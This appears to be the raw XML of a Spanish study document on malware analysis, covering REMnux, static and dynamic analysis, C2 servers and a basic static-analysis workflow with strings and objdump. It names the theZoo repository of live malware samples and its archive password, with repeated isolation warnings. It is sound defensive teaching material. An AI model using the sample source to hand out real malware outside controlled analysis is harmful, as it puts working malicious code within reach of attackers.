        <w:t xml:space="preserve">Herramienta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>REMux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Remnux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6B0948" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>REMnux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> es una distribución Linux especializada para análisis de malware e ingeniería inversa. Incluye herramientas para análisis estático y dinámico de archivos maliciosos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FCE79" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB0BE16" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Análisis de Malware — Conceptos Fundamentales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767952CA" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Los malware son programas con comportamiento autónomo y malicioso. El análisis siempre debe realizarse en un entorno aislado (máquina virtual sin internet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276A18E1" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C492F34" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Tipos de análisis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA4B1F7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r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Análisis estático: examinar el código/binario sin ejecutarlo. Se usan herramientas para ver </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>strings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>imports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>, cabeceras PE, comentarios del programador. El malware suele estar escrito en C o C++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BFC90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r w:rsidRPr="00A5184A">
        <w:t>Análisis dinámico: ejecutar el malware en un entorno controlado y observar su comportamiento en tiempo real (conexiones de red, archivos creados, procesos, etc.). Se usa Wireshark para capturar tráfico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125041F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041BCAA5" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Infraestructura de malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3939C3F4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r w:rsidRPr="00A5184A">
        <w:t>C2C (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> &amp; Control): servidor remoto que controla las máquinas infectadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781F4CD3" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184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 w:rsidRPr="00A5184A">
        <w:t>Ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>: cifra los archivos de la víctima y pide rescate económico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D32BCB" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3743EF60" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Fuentes para obtener muestras de malware (laboratorio)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5B6B5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430D8B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# Repositorio de muestras de malware para análisis académico # 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https://github.com/ytisf/theZoo  (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The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Zoo")  # Las muestras siempre vienen en formato .zip con contraseña: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infected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# Nunca ejecutar en el equipo host, solo en VM aislada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FA4FFBB" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B38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108E5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36C4C" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️ Precaución: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5184A">
              <w:t>Las muestras de malware son ejecutables reales. Nunca descomprimir ni ejecutar fuera de una máquina virtual aislada sin acceso a internet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40C85123" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FDD7CA3" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Flujo de trabajo para análisis estático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4E930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0359A6" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr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# 1. Descomprimir la muestra (contraseña estándar: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infected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unzip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-P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infected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muestra.zip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2. Identificar tipo de archivo file </w:t>
            </w:r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muestra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3. Ver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strings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legibles embebidas en el binario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strings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muestra | grep -i 'http\|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\|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cmd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\|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pass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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'  #</w:t>
            </w:r>
            <w:proofErr w:type="gram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4. Ver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imports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DLLs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y funciones que usa)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objdump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-x muestra   # En Linux # En Windows: CFF Explorer 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PEview</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79687F3E" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E65CB8" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:lastRenderedPageBreak/>
        <w:t>Comandos Linux de Referencia Rápida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5184A" w:rsidRPr="00A5184A" w14:paraId="59192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7FC799" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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ls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-la              # Listar archivos con permisos y propietarios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pwd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# Mostrar directorio actual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mkdir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&lt;nombre&gt;      # Crear directorio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rm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&lt;archivo&gt;        # Borrar archivo (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rm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rf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para carpetas)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chmod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700 &lt;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dir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    # Permisos: solo el propietario puede leer/escribir/ejecutar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cat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&lt;archivo&gt;       # Mostrar contenido de un archivo echo 'texto'        # Imprimir texto en pantalla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tr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'a' 'b'          # Reemplazar caracteres (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translate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) base64 -d           # Decodificar Base64 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>rev</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A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# Invertir texto file &lt;archivo&gt;      # Detectar tipo de archivo por firma</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3409925B" w14:textId="77777777" w:rsidR="00EE6CEB" w:rsidRPr="00A5184A" w:rsidRDefault="00EE6CEB"/>
    <w:sectPr w:rsidR="00EE6CEB" w:rsidRPr="00A518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362EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="108A05AC"/>
    <w:lvl w:ilvl="0" w:tplc="06CC03B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DAC0B0D4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="686C98CC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6FF225E8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9F68D734">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="957069FC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="72CA40F8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C380A808">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BFB2B91E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="649A2C8A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A95A54D2"/>
    <w:lvl w:ilvl="0" w:tplc="7AB4C398">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="25E2AC12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A5A429D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3314005A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EB802B3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="59BA9F14">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2E969022">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="132021F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="750E367A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="995646859">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1612011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814"/>
    <w:rsid w:val="004B3814"/>
    <w:rsid w:val="00A5184A"/>
    <w:rsid w:val="00EE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FA238"/>
  <w15:docId w15:val="{388E8460-7F1E-4155-B547-4D86DB01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1734</Words>
  <Characters>9543</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>79</Lines>
  <Paragraphs>22</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Claudia Pereira Cuba</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-24T23:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-24T23:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>